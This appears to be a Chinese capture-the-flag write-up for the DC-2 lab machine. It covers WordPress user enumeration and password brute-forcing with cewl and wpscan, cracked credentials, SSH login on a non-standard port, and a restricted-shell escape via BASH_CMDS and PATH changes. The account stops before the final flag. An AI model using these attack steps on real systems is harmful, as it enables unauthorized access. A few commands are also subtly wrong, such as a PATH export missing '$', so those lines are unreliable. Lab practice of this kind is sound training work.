Did not follow redirect to http://dc-2/
需要DNS解析,在本地设置
vi /etc/hosts
添加 192.168.219.133 DC-2
就可以访问http://dc-2/了
3、dirsearch -u 192.168.219.133 -x 403,404
二、渗透测试
1、进入网站,得到flag1
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
2、使用cewl获取密码字典
cewl http://dc-2/ -w passwd.txt
3、wpscan
// 爆破用户名,获得admin, tom, jerry
wpscan --url http://dc-2/ --enumerate u
// 使用用户名和前面生成的密码字典进行匹配
wpscan --url http://dc-2/ -P passwd.txt -U admin
wpscan --url http://dc-2/ -P passwd.txt -U jerry
wpscan --url http://dc-2/ -P passwd.txt -U tom
匹配的用户名和密码
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
根据前面dirsearch的扫描结果,发现登录后台http://dc-2/wp-admin/,使用上面爆破的用户名和密码登录(jerry账户)
进入Page页面,找到flag2
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
4、根据提示,换个方法登录
可能是ssh登录?
nmap再扫描一遍,结果还是一样
加个参数,-p-全部端口扫描
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
登录
ssh tom@192.168.219.133 -p 7744
ls 发现fag3.txt
vi flag3.txt
flag3:Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
5、提权
发现自己很多命令无法使用
echo $PATH // 查看自己命令行在哪
发现自己在/usr/bin(命令行被大幅限制)
ls usr/bin // 看看自己可以使用哪些命令
// 提权
测试1:BASH_CMDS[a]=/bin/sh // 按下假盘a就能调用/bin/sh
测试2:/bin/sh // 直接调用
测试3:
export PATH=PATH:/bin
export PATH=PATH:/sbin:/bin // 把高级权限的命令行加入自己的环境变量
提权成功(可以使用cat等命令)
su jerry // 提权到jerry
cd ~ // 回到自己的home目录
ls发现flag4.txt
cat flag4.txt
flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!